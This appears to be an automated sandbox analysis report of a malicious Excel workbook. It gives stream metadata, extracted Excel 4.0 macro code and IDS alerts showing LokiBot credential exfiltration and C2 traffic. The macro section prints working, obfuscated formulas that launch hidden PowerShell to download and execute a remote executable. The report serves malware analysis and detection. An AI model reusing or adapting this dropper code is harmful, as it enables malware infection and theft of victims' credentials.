Last Saved Time: | 2021-01-05 14:27:14 |
Security: | 0 |
Document Summary | |
---|---|
Document Code Page: | 1252 |
Thumbnail Scaling Desired: | False |
Contains Dirty Links: | False |
Shared Document: | False |
Changed Hyperlinks: | False |
Application Version: | 983040 |
Streams |
---|
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5DocumentSummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.232115956307 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 b0 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 8b 00 00 00 02 00 00 00 e4 04 00 00 |
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5SummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.190042678721 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . h . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . . . . . . . . . . . . . D e l l . . . . @ . . . . L . z . . . . @ . . . . . . . n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 68 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 08 00 00 00 38 00 00 00 0c 00 00 00 48 00 00 00 0d 00 00 00 54 00 00 00 13 00 00 00 60 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 08 00 00 00 44 65 6c 6c 00 00 00 00 40 00 00 00 00 4c f7 7a |
Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 116784 |
---|
General | |
---|---|
Stream Path: | Workbook |
File Type: | Applesoft BASIC program data, first line number 16 |
Stream Size: | 116784 |
Entropy: | 7.53092053212 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . T 8 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . D e l l B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . p ^ ) 8 . . . . . . . X . @ . . |
Data Raw: | 09 08 10 00 00 06 05 00 54 38 cd 07 c9 00 02 00 06 07 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 04 00 00 44 65 6c 6c 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 |
Macro 4.0 Code |
---|
=ERROR(FALSE),,,,,,,,,"=GET.CELL(5,M583)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(D117)&""o^wer^she^l^l -w 1 (nEw-oB`jecT Ne""&CHAR(116)&CHAR(46)&CHAR(87)&CHAR(101)&""bcLIENt).('Do""&CHAR(119)&""n'+'loadFile').In""&CHAR(118)&""oke('""&CHAR(104)&""ttps://cutt.ly/qjdJoz4','12""&CHAR(46)&""exe')"")",,,,,,,,,"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(D117)&""o^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item """"12""&CHAR(46)&""exe"""" -Destination """"${enV`:temp}"""""")",,,,,,,,,"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(D117)&""o^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12""&CHAR(46)&""exe')"")",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
Network Behavior |
---|
Snort IDS Alerts |
---|
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
01/05/21-19:05:22.500040 | TCP | 2021697 | ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious | 49167 | 80 | 192.168.2.22 | 83.172.144.37 |
01/05/21-19:06:07.649980 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49168 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:07.649980 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49168 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:07.649980 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49168 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:07.649980 | TCP | 2024317 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 | 49168 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:08.163209 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49169 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:08.163209 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49169 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:08.163209 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49169 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:08.163209 | TCP | 2024317 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 | 49169 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:08.473302 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49170 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:08.473302 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49170 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:08.473302 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49170 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:08.473302 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49170 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:08.645122 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49170 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:08.887025 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49171 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:08.887025 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49171 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:08.887025 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49171 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:08.887025 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49171 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:09.065680 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49171 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:09.279376 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49172 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:09.279376 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49172 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:09.279376 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49172 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:09.279376 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49172 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:09.462394 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49172 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:09.669670 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49173 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:09.669670 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49173 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:09.669670 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49173 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:09.669670 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49173 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:09.843837 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49173 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:10.067266 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49174 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:10.067266 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49174 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:10.067266 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49174 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:10.067266 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49174 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:10.236854 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49174 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:10.499611 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49175 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:10.499611 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49175 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:10.499611 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49175 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:10.499611 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49175 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:10.673143 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49175 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:10.888136 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49176 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:10.888136 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49176 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:10.888136 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49176 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:10.888136 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49176 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:11.065621 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49176 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:11.296993 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49177 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:11.296993 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49177 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:11.296993 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49177 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:11.296993 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49177 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:11.461579 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49177 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:11.686950 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49178 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:11.686950 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49178 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:11.686950 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49178 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:11.686950 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49178 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:11.871413 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49178 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:12.075634 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49179 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:12.075634 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49179 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:12.075634 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49179 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:12.075634 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49179 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:12.243051 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49179 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:12.449877 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49180 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:12.449877 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49180 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:12.449877 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49180 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:12.449877 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49180 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:12.609106 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49180 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:12.832799 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49181 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:12.832799 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49181 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:12.832799 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49181 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:12.832799 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49181 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:12.987731 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49181 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:13.213064 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49182 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:13.213064 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49182 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:13.213064 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49182 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:13.213064 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49182 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:13.388159 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49182 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:13.606387 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49183 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:13.606387 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49183 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:13.606387 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49183 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:13.606387 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49183 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:13.778989 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49183 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:14.002546 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49184 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:14.002546 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49184 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:14.002546 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49184 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:14.002546 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49184 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:14.168912 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49184 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:14.391399 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49185 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:14.391399 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49185 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:14.391399 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49185 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:14.391399 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49185 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:14.558086 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49185 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:14.788464 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49186 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:14.788464 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49186 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:14.788464 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49186 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:14.788464 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49186 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:14.954180 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49186 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:15.165872 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49187 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:15.165872 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49187 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:15.165872 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49187 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:15.165872 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49187 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:15.352806 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49187 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:15.552401 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49188 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:15.552401 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49188 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:15.552401 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49188 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:15.552401 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49188 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:15.734059 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49188 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:15.960354 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49189 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:15.960354 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49189 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:15.960354 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49189 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:15.960354 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49189 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:16.139385 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49189 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:16.358508 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49190 | 80 | 192.168.2.22 | 185.206.215.56 |
